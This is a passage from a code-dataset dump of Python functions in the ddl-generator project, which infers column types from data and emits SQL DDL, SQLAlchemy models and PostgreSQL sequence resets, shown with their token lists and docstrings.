Dataset schema (one function per record):

| column | dtype | notes |
|---|---|---|
| repository_name | string | lengths 7–55 |
| func_path_in_repository | string | lengths 4–223 |
| func_name | string | lengths 1–134 |
| whole_func_string | string | lengths 75–104k |
| language | string | 1 class: python |
| func_code_string | string | lengths 75–104k |
| func_code_tokens | sequence | lengths 19–28.4k |
| func_documentation_string | string | lengths 1–46.9k |
| func_documentation_tokens | sequence | lengths 1–1.97k |
| split_name | string | 1 class: train |
| func_code_url | string | lengths 87–315 |

Each record below is shown as `repository_name | func_path_in_repository | func_name | language | split_name | func_code_url`, followed by the function source (`whole_func_string`; `func_code_string` duplicates it verbatim, and the token and documentation columns are derived from it).

catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | best_coercable | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L215-L247

def best_coercable(data):
    """
    Given an iterable of scalar data, returns the datum representing the most specific
    data type the list overall can be coerced into, preferring datetimes, then bools,
    then integers, then decimals, then floats, then strings.

    >>> best_coercable((6, '2', 9))
    6
    >>> best_coercable((Decimal('6.1'), 2, 9))
    Decimal('6.1')
    >>> best_coercable(('2014 jun 7', '2011 may 2'))
    datetime.datetime(2014, 6, 7, 0, 0)
    >>> best_coercable((7, 21.4, 'ruining everything'))
    'ruining everything'
    """
    preference = (datetime.datetime, bool, int, Decimal, float, str)
    worst_pref = 0
    worst = ''
    for datum in data:
        coerced = coerce_to_specific(datum)
        pref = preference.index(type(coerced))
        if pref > worst_pref:
            worst_pref = pref
            worst = coerced
        elif pref == worst_pref:
            if isinstance(coerced, Decimal):
                worst = worst_decimal(coerced, worst)
            elif isinstance(coerced, float):
                worst = max(coerced, worst)
            else:  # int, str
                if len(str(coerced)) > len(str(worst)):
                    worst = coerced
    return worst
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst | [
"def",
"best_coercable",
"(",
"data",
")",
":",
"preference",
"=",
"(",
"datetime",
".",
"datetime",
",",
"bool",
",",
"int",
",",
"Decimal",
",",
"float",
",",
"str",
")",
"worst_pref",
"=",
"0",
"worst",
"=",
"''",
"for",
"datum",
"in",
"data",
":",
"coerced",
"=",
"coerce_to_specific",
"(",
"datum",
")",
"pref",
"=",
"preference",
".",
"index",
"(",
"type",
"(",
"coerced",
")",
")",
"if",
"pref",
">",
"worst_pref",
":",
"worst_pref",
"=",
"pref",
"worst",
"=",
"coerced",
"elif",
"pref",
"==",
"worst_pref",
":",
"if",
"isinstance",
"(",
"coerced",
",",
"Decimal",
")",
":",
"worst",
"=",
"worst_decimal",
"(",
"coerced",
",",
"worst",
")",
"elif",
"isinstance",
"(",
"coerced",
",",
"float",
")",
":",
"worst",
"=",
"max",
"(",
"coerced",
",",
"worst",
")",
"else",
":",
"# int, str",
"if",
"len",
"(",
"str",
"(",
"coerced",
")",
")",
">",
"len",
"(",
"str",
"(",
"worst",
")",
")",
":",
"worst",
"=",
"coerced",
"return",
"worst"
] | Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything' | [
"Given",
"an",
"iterable",
"of",
"scalar",
"data",
"returns",
"the",
"datum",
"representing",
"the",
"most",
"specific",
"data",
"type",
"the",
"list",
"overall",
"can",
"be",
"coerced",
"into",
"preferring",
"datetimes",
"then",
"bools",
"then",
"integers",
"then",
"decimals",
"then",
"floats",
"then",
"strings",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L215-L247 |

catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | sqla_datatype_for | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L249-L270

def sqla_datatype_for(datum):
    """
    Given a scalar Python value, picks an appropriate SQLAlchemy data type.

    >>> sqla_datatype_for(7.2)
    DECIMAL(precision=2, scale=1)
    >>> sqla_datatype_for("Jan 17 2012")
    <class 'sqlalchemy.sql.sqltypes.DATETIME'>
    >>> sqla_datatype_for("something else")
    Unicode(length=14)
    """
    try:
        if len(_complex_enough_to_be_date.findall(datum)) > 1:
            dateutil.parser.parse(datum)
            return sa.DATETIME
    except (TypeError, ValueError):
        pass
    try:
        (prec, scale) = precision_and_scale(datum)
        return sa.DECIMAL(prec, scale)
    except TypeError:
        return sa.Unicode(len(datum))
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum)) | [
"def",
"sqla_datatype_for",
"(",
"datum",
")",
":",
"try",
":",
"if",
"len",
"(",
"_complex_enough_to_be_date",
".",
"findall",
"(",
"datum",
")",
")",
">",
"1",
":",
"dateutil",
".",
"parser",
".",
"parse",
"(",
"datum",
")",
"return",
"sa",
".",
"DATETIME",
"except",
"(",
"TypeError",
",",
"ValueError",
")",
":",
"pass",
"try",
":",
"(",
"prec",
",",
"scale",
")",
"=",
"precision_and_scale",
"(",
"datum",
")",
"return",
"sa",
".",
"DECIMAL",
"(",
"prec",
",",
"scale",
")",
"except",
"TypeError",
":",
"return",
"sa",
".",
"Unicode",
"(",
"len",
"(",
"datum",
")",
")"
] | Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14) | [
"Given",
"a",
"scalar",
"Python",
"value",
"picks",
"an",
"appropriate",
"SQLAlchemy",
"data",
"type",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L249-L270 |

catherinedevlin/ddl-generator | ddlgenerator/console.py | generate_one | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L51-L70

def generate_one(tbl, args, table_name=None, file=None):
    """
    Prints code (SQL, SQLAlchemy, etc.) to define a table.
    """
    table = Table(tbl, table_name=table_name, varying_length_text=args.text,
                  uniques=args.uniques, pk_name=args.key, force_pk=args.force_key,
                  reorder=args.reorder, data_size_cushion=args.cushion,
                  save_metadata_to=args.save_metadata_to,
                  metadata_source=args.use_metadata_from,
                  loglevel=args.log, limit=args.limit)
    if args.dialect.startswith('sqla'):
        if not args.no_creates:
            print(table.sqlalchemy(), file=file)
        if args.inserts:
            print("\n".join(table.inserts(dialect=args.dialect)), file=file)
    elif args.dialect.startswith('dj'):
        table.django_models()
    else:
        print(table.sql(dialect=args.dialect, inserts=args.inserts,
                        creates=(not args.no_creates), drops=args.drops,
                        metadata_source=args.use_metadata_from), file=file)
    return table
"""
Prints code (SQL, SQLAlchemy, etc.) to define a table.
"""
table = Table(tbl, table_name=table_name, varying_length_text=args.text, uniques=args.uniques,
pk_name = args.key, force_pk=args.force_key, reorder=args.reorder, data_size_cushion=args.cushion,
save_metadata_to=args.save_metadata_to, metadata_source=args.use_metadata_from,
loglevel=args.log, limit=args.limit)
if args.dialect.startswith('sqla'):
if not args.no_creates:
print(table.sqlalchemy(), file=file)
if args.inserts:
print("\n".join(table.inserts(dialect=args.dialect)), file=file)
elif args.dialect.startswith('dj'):
table.django_models()
else:
print(table.sql(dialect=args.dialect, inserts=args.inserts,
creates=(not args.no_creates), drops=args.drops,
metadata_source=args.use_metadata_from), file=file)
return table | [
"def",
"generate_one",
"(",
"tbl",
",",
"args",
",",
"table_name",
"=",
"None",
",",
"file",
"=",
"None",
")",
":",
"table",
"=",
"Table",
"(",
"tbl",
",",
"table_name",
"=",
"table_name",
",",
"varying_length_text",
"=",
"args",
".",
"text",
",",
"uniques",
"=",
"args",
".",
"uniques",
",",
"pk_name",
"=",
"args",
".",
"key",
",",
"force_pk",
"=",
"args",
".",
"force_key",
",",
"reorder",
"=",
"args",
".",
"reorder",
",",
"data_size_cushion",
"=",
"args",
".",
"cushion",
",",
"save_metadata_to",
"=",
"args",
".",
"save_metadata_to",
",",
"metadata_source",
"=",
"args",
".",
"use_metadata_from",
",",
"loglevel",
"=",
"args",
".",
"log",
",",
"limit",
"=",
"args",
".",
"limit",
")",
"if",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'sqla'",
")",
":",
"if",
"not",
"args",
".",
"no_creates",
":",
"print",
"(",
"table",
".",
"sqlalchemy",
"(",
")",
",",
"file",
"=",
"file",
")",
"if",
"args",
".",
"inserts",
":",
"print",
"(",
"\"\\n\"",
".",
"join",
"(",
"table",
".",
"inserts",
"(",
"dialect",
"=",
"args",
".",
"dialect",
")",
")",
",",
"file",
"=",
"file",
")",
"elif",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'dj'",
")",
":",
"table",
".",
"django_models",
"(",
")",
"else",
":",
"print",
"(",
"table",
".",
"sql",
"(",
"dialect",
"=",
"args",
".",
"dialect",
",",
"inserts",
"=",
"args",
".",
"inserts",
",",
"creates",
"=",
"(",
"not",
"args",
".",
"no_creates",
")",
",",
"drops",
"=",
"args",
".",
"drops",
",",
"metadata_source",
"=",
"args",
".",
"use_metadata_from",
")",
",",
"file",
"=",
"file",
")",
"return",
"table"
] | Prints code (SQL, SQLAlchemy, etc.) to define a table. | [
"Prints",
"code",
"(",
"SQL",
"SQLAlchemy",
"etc",
".",
")",
"to",
"define",
"a",
"table",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L51-L70 |
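
A minimal usage sketch for `generate_one`, not taken from the repository: the attribute names on `args` come from the function body above, but the default values chosen here are assumptions (the real defaults are defined by the package's command-line parser).

from argparse import Namespace
from ddlgenerator.console import generate_one

# Hypothetical defaults; the real ones come from ddlgenerator's CLI parser.
args = Namespace(
    dialect='postgresql', text=False, uniques=False, key=None, force_key=False,
    reorder=False, cushion=0, save_metadata_to=None, use_metadata_from=None,
    log='WARNING', limit=None, no_creates=False, inserts=True, drops=True)

# Prints DROP/CREATE (and INSERT) statements for the rows to stdout.
table = generate_one([{'name': 'Lancelot', 'quest': 'Grail'}], args,
                     table_name='knights')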

catherinedevlin/ddl-generator | ddlgenerator/console.py | generate | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L72-L112

def generate(args=None, namespace=None, file=None):
    """
    Generate DDL from the data sources named.

    :args: String or list of strings to be parsed for arguments
    :namespace: Namespace to extract arguments from
    :file: Write to this open file object (default stdout)
    """
    if hasattr(args, 'split'):
        args = args.split()
    args = parser.parse_args(args, namespace)
    set_logging(args)
    logging.info(str(args))
    if args.dialect in ('pg', 'pgsql', 'postgres'):
        args.dialect = 'postgresql'
    if args.dialect.startswith('dj'):
        args.dialect = 'django'
    elif args.dialect.startswith('sqla'):
        args.dialect = 'sqlalchemy'
    if args.dialect not in dialect_names:
        raise NotImplementedError('First arg must be one of: %s' %
                                  ", ".join(dialect_names))
    if args.dialect == 'sqlalchemy':
        print(sqla_head, file=file)
    for datafile in args.datafile:
        if is_sqlalchemy_url.search(datafile):
            table_names_for_insert = []
            for tbl in sqlalchemy_table_sources(datafile):
                t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
                if t.data:
                    table_names_for_insert.append(tbl.generator.name)
            if args.inserts and args.dialect == 'sqlalchemy':
                print(sqla_inserter_call(table_names_for_insert), file=file)
            if t and args.inserts:
                for seq_update in emit_db_sequence_updates(t.source.db_engine):
                    if args.dialect == 'sqlalchemy':
                        print(' conn.execute("%s")' % seq_update, file=file)
                    elif args.dialect == 'postgresql':
                        print(seq_update, file=file)
        else:
            generate_one(datafile, args, file=file)
"""
Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout)
"""
if hasattr(args, 'split'):
args = args.split()
args = parser.parse_args(args, namespace)
set_logging(args)
logging.info(str(args))
if args.dialect in ('pg', 'pgsql', 'postgres'):
args.dialect = 'postgresql'
if args.dialect.startswith('dj'):
args.dialect = 'django'
elif args.dialect.startswith('sqla'):
args.dialect = 'sqlalchemy'
if args.dialect not in dialect_names:
raise NotImplementedError('First arg must be one of: %s' % ", ".join(dialect_names))
if args.dialect == 'sqlalchemy':
print(sqla_head, file=file)
for datafile in args.datafile:
if is_sqlalchemy_url.search(datafile):
table_names_for_insert = []
for tbl in sqlalchemy_table_sources(datafile):
t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
if t.data:
table_names_for_insert.append(tbl.generator.name)
if args.inserts and args.dialect == 'sqlalchemy':
print(sqla_inserter_call(table_names_for_insert), file=file)
if t and args.inserts:
for seq_update in emit_db_sequence_updates(t.source.db_engine):
if args.dialect == 'sqlalchemy':
print(' conn.execute("%s")' % seq_update, file=file)
elif args.dialect == 'postgresql':
print(seq_update, file=file)
else:
generate_one(datafile, args, file=file) | [
"def",
"generate",
"(",
"args",
"=",
"None",
",",
"namespace",
"=",
"None",
",",
"file",
"=",
"None",
")",
":",
"if",
"hasattr",
"(",
"args",
",",
"'split'",
")",
":",
"args",
"=",
"args",
".",
"split",
"(",
")",
"args",
"=",
"parser",
".",
"parse_args",
"(",
"args",
",",
"namespace",
")",
"set_logging",
"(",
"args",
")",
"logging",
".",
"info",
"(",
"str",
"(",
"args",
")",
")",
"if",
"args",
".",
"dialect",
"in",
"(",
"'pg'",
",",
"'pgsql'",
",",
"'postgres'",
")",
":",
"args",
".",
"dialect",
"=",
"'postgresql'",
"if",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'dj'",
")",
":",
"args",
".",
"dialect",
"=",
"'django'",
"elif",
"args",
".",
"dialect",
".",
"startswith",
"(",
"'sqla'",
")",
":",
"args",
".",
"dialect",
"=",
"'sqlalchemy'",
"if",
"args",
".",
"dialect",
"not",
"in",
"dialect_names",
":",
"raise",
"NotImplementedError",
"(",
"'First arg must be one of: %s'",
"%",
"\", \"",
".",
"join",
"(",
"dialect_names",
")",
")",
"if",
"args",
".",
"dialect",
"==",
"'sqlalchemy'",
":",
"print",
"(",
"sqla_head",
",",
"file",
"=",
"file",
")",
"for",
"datafile",
"in",
"args",
".",
"datafile",
":",
"if",
"is_sqlalchemy_url",
".",
"search",
"(",
"datafile",
")",
":",
"table_names_for_insert",
"=",
"[",
"]",
"for",
"tbl",
"in",
"sqlalchemy_table_sources",
"(",
"datafile",
")",
":",
"t",
"=",
"generate_one",
"(",
"tbl",
",",
"args",
",",
"table_name",
"=",
"tbl",
".",
"generator",
".",
"name",
",",
"file",
"=",
"file",
")",
"if",
"t",
".",
"data",
":",
"table_names_for_insert",
".",
"append",
"(",
"tbl",
".",
"generator",
".",
"name",
")",
"if",
"args",
".",
"inserts",
"and",
"args",
".",
"dialect",
"==",
"'sqlalchemy'",
":",
"print",
"(",
"sqla_inserter_call",
"(",
"table_names_for_insert",
")",
",",
"file",
"=",
"file",
")",
"if",
"t",
"and",
"args",
".",
"inserts",
":",
"for",
"seq_update",
"in",
"emit_db_sequence_updates",
"(",
"t",
".",
"source",
".",
"db_engine",
")",
":",
"if",
"args",
".",
"dialect",
"==",
"'sqlalchemy'",
":",
"print",
"(",
"' conn.execute(\"%s\")'",
"%",
"seq_update",
",",
"file",
"=",
"file",
")",
"elif",
"args",
".",
"dialect",
"==",
"'postgresql'",
":",
"print",
"(",
"seq_update",
",",
"file",
"=",
"file",
")",
"else",
":",
"generate_one",
"(",
"datafile",
",",
"args",
",",
"file",
"=",
"file",
")"
] | Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout) | [
"Genereate",
"DDL",
"from",
"data",
"sources",
"named",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L72-L112 |
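
A usage sketch assuming only what the function body shows: arguments may be a single string or a list, the dialect comes first, and the remaining positional arguments are data sources (the file name here is a placeholder).

import sys
from ddlgenerator.console import generate

generate('postgresql mydata.yaml', file=sys.stdout)  # prints DDL for mydata.yaml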

catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | emit_db_sequence_updates | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L557-L575

def emit_db_sequence_updates(engine):
    """Set database sequence objects to match the source db

    Relevant only when generated from SQLAlchemy connection.
    Needed to avoid subsequent unique key violations after DB build."""
    if engine and engine.name == 'postgresql':
        # not implemented for other RDBMS; necessity unknown
        conn = engine.connect()
        qry = """SELECT 'SELECT last_value FROM ' || n.nspname ||
                        '.' || c.relname || ';' AS qry,
                        n.nspname || '.' || c.relname AS qual_name
                 FROM pg_namespace n
                 JOIN pg_class c ON (n.oid = c.relnamespace)
                 WHERE c.relkind = 'S'"""
        for (qry, qual_name) in list(conn.execute(qry)):
            (lastval, ) = conn.execute(qry).first()
            nextval = int(lastval) + 1
            yield "ALTER SEQUENCE %s RESTART WITH %s;" % (qual_name, nextval)
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if engine and engine.name == 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname ||
'.' || c.relname || ';' AS qry,
n.nspname || '.' || c.relname AS qual_name
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
for (qry, qual_name) in list(conn.execute(qry)):
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % (qual_name, nextval) | [
"def",
"emit_db_sequence_updates",
"(",
"engine",
")",
":",
"if",
"engine",
"and",
"engine",
".",
"name",
"==",
"'postgresql'",
":",
"# not implemented for other RDBMS; necessity unknown",
"conn",
"=",
"engine",
".",
"connect",
"(",
")",
"qry",
"=",
"\"\"\"SELECT 'SELECT last_value FROM ' || n.nspname ||\n '.' || c.relname || ';' AS qry,\n n.nspname || '.' || c.relname AS qual_name\n FROM pg_namespace n\n JOIN pg_class c ON (n.oid = c.relnamespace)\n WHERE c.relkind = 'S'\"\"\"",
"for",
"(",
"qry",
",",
"qual_name",
")",
"in",
"list",
"(",
"conn",
".",
"execute",
"(",
"qry",
")",
")",
":",
"(",
"lastval",
",",
")",
"=",
"conn",
".",
"execute",
"(",
"qry",
")",
".",
"first",
"(",
")",
"nextval",
"=",
"int",
"(",
"lastval",
")",
"+",
"1",
"yield",
"\"ALTER SEQUENCE %s RESTART WITH %s;\"",
"%",
"(",
"qual_name",
",",
"nextval",
")"
] | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | [
"Set",
"database",
"sequence",
"objects",
"to",
"match",
"the",
"source",
"db"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L557-L575 |
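
A usage sketch for the generator above, assuming a SQLAlchemy engine bound to a PostgreSQL database (the connection URL is a placeholder):

import sqlalchemy as sa
from ddlgenerator.ddlgenerator import emit_db_sequence_updates

engine = sa.create_engine('postgresql://scott:tiger@localhost/mydb')  # placeholder
for statement in emit_db_sequence_updates(engine):
    print(statement)  # e.g. ALTER SEQUENCE public.knights_id_seq RESTART WITH 42;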

catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.ddl | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L263-L281

def ddl(self, dialect=None, creates=True, drops=True):
    """
    Returns SQL to define the table.
    """
    dialect = self._dialect(dialect)
    creator = CreateTable(self.table).compile(mock_engines[dialect])
    creator = "\n".join(l for l in str(creator).splitlines() if l.strip())  # remove empty lines
    comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
                                                      (col, self.comments[col]))
                           for col in self.comments)
    result = []
    if drops:
        result.append(self._dropper(dialect) + ';')
    if creates:
        result.append("%s;\n%s" % (creator, comments))
    for child in self.children.values():
        result.append(child.ddl(dialect=dialect, creates=creates,
                                drops=drops))
    return '\n\n'.join(result)
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result) | [
"def",
"ddl",
"(",
"self",
",",
"dialect",
"=",
"None",
",",
"creates",
"=",
"True",
",",
"drops",
"=",
"True",
")",
":",
"dialect",
"=",
"self",
".",
"_dialect",
"(",
"dialect",
")",
"creator",
"=",
"CreateTable",
"(",
"self",
".",
"table",
")",
".",
"compile",
"(",
"mock_engines",
"[",
"dialect",
"]",
")",
"creator",
"=",
"\"\\n\"",
".",
"join",
"(",
"l",
"for",
"l",
"in",
"str",
"(",
"creator",
")",
".",
"splitlines",
"(",
")",
"if",
"l",
".",
"strip",
"(",
")",
")",
"# remove empty lines",
"comments",
"=",
"\"\\n\\n\"",
".",
"join",
"(",
"self",
".",
"_comment_wrapper",
".",
"fill",
"(",
"\"in %s: %s\"",
"%",
"(",
"col",
",",
"self",
".",
"comments",
"[",
"col",
"]",
")",
")",
"for",
"col",
"in",
"self",
".",
"comments",
")",
"result",
"=",
"[",
"]",
"if",
"drops",
":",
"result",
".",
"append",
"(",
"self",
".",
"_dropper",
"(",
"dialect",
")",
"+",
"';'",
")",
"if",
"creates",
":",
"result",
".",
"append",
"(",
"\"%s;\\n%s\"",
"%",
"(",
"creator",
",",
"comments",
")",
")",
"for",
"child",
"in",
"self",
".",
"children",
".",
"values",
"(",
")",
":",
"result",
".",
"append",
"(",
"child",
".",
"ddl",
"(",
"dialect",
"=",
"dialect",
",",
"creates",
"=",
"creates",
",",
"drops",
"=",
"drops",
")",
")",
"return",
"'\\n\\n'",
".",
"join",
"(",
"result",
")"
] | Returns SQL to define the table. | [
"Returns",
"SQL",
"to",
"define",
"the",
"table",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L263-L281 |
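
A sketch of calling `Table.ddl` directly; it assumes the `Table` constructor's remaining keywords (seen in `generate_one` above) have usable defaults, and the data is hypothetical.

from ddlgenerator.ddlgenerator import Table

rows = [{'name': 'Arthur', 'crowned': '932-01-01'},
        {'name': 'Aelle', 'crowned': '933-06-15'}]
table = Table(rows, table_name='monarchs')
print(table.ddl(dialect='postgresql', drops=False))  # CREATE TABLE only, no DROPs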

catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sqlalchemy | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L292-L320

def sqlalchemy(self, is_top=True):
    """Dumps Python code to set up the table's SQLAlchemy model"""
    table_def = self.table_backref_remover.sub('', self.table.__repr__())
    # inject UNIQUE constraints into table definition
    constraint_defs = []
    for constraint in self.table.constraints:
        if isinstance(constraint, sa.sql.schema.UniqueConstraint):
            col_list = ', '.join("'%s'" % c.name
                                 for c in constraint.columns)
            constraint_defs.append('UniqueConstraint(%s)' % col_list)
    if constraint_defs:
        constraint_defs = ',\n '.join(constraint_defs) + ','
        table_def = table_def.replace('schema=None',
                                      '\n ' + constraint_defs + 'schema=None')
    table_def = table_def.replace("MetaData(bind=None)", "metadata")
    table_def = table_def.replace("Column(", "\n Column(")
    table_def = table_def.replace("schema=", "\n schema=")
    result = [table_def, ]
    result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
    result = "\n%s = %s" % (self.table_name, "\n".join(result))
    if is_top:
        sqla_imports = set(self.capitalized_words.findall(table_def))
        sqla_imports &= set(dir(sa))
        sqla_imports = sorted(sqla_imports)
        result = self.sqlalchemy_setup_template % (
            ", ".join(sqla_imports), result, self.table.name)
    result = textwrap.dedent(result)
    return result
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result | [
"def",
"sqlalchemy",
"(",
"self",
",",
"is_top",
"=",
"True",
")",
":",
"table_def",
"=",
"self",
".",
"table_backref_remover",
".",
"sub",
"(",
"''",
",",
"self",
".",
"table",
".",
"__repr__",
"(",
")",
")",
"# inject UNIQUE constraints into table definition",
"constraint_defs",
"=",
"[",
"]",
"for",
"constraint",
"in",
"self",
".",
"table",
".",
"constraints",
":",
"if",
"isinstance",
"(",
"constraint",
",",
"sa",
".",
"sql",
".",
"schema",
".",
"UniqueConstraint",
")",
":",
"col_list",
"=",
"', '",
".",
"join",
"(",
"\"'%s'\"",
"%",
"c",
".",
"name",
"for",
"c",
"in",
"constraint",
".",
"columns",
")",
"constraint_defs",
".",
"append",
"(",
"'UniqueConstraint(%s)'",
"%",
"col_list",
")",
"if",
"constraint_defs",
":",
"constraint_defs",
"=",
"',\\n '",
".",
"join",
"(",
"constraint_defs",
")",
"+",
"','",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"'schema=None'",
",",
"'\\n '",
"+",
"constraint_defs",
"+",
"'schema=None'",
")",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"\"MetaData(bind=None)\"",
",",
"\"metadata\"",
")",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"\"Column(\"",
",",
"\"\\n Column(\"",
")",
"table_def",
"=",
"table_def",
".",
"replace",
"(",
"\"schema=\"",
",",
"\"\\n schema=\"",
")",
"result",
"=",
"[",
"table_def",
",",
"]",
"result",
".",
"extend",
"(",
"c",
".",
"sqlalchemy",
"(",
"is_top",
"=",
"False",
")",
"for",
"c",
"in",
"self",
".",
"children",
".",
"values",
"(",
")",
")",
"result",
"=",
"\"\\n%s = %s\"",
"%",
"(",
"self",
".",
"table_name",
",",
"\"\\n\"",
".",
"join",
"(",
"result",
")",
")",
"if",
"is_top",
":",
"sqla_imports",
"=",
"set",
"(",
"self",
".",
"capitalized_words",
".",
"findall",
"(",
"table_def",
")",
")",
"sqla_imports",
"&=",
"set",
"(",
"dir",
"(",
"sa",
")",
")",
"sqla_imports",
"=",
"sorted",
"(",
"sqla_imports",
")",
"result",
"=",
"self",
".",
"sqlalchemy_setup_template",
"%",
"(",
"\", \"",
".",
"join",
"(",
"sqla_imports",
")",
",",
"result",
",",
"self",
".",
"table",
".",
"name",
")",
"result",
"=",
"textwrap",
".",
"dedent",
"(",
"result",
")",
"return",
"result"
] | Dumps Python code to set up the table's SQLAlchemy model | [
"Dumps",
"Python",
"code",
"to",
"set",
"up",
"the",
"table",
"s",
"SQLAlchemy",
"model"
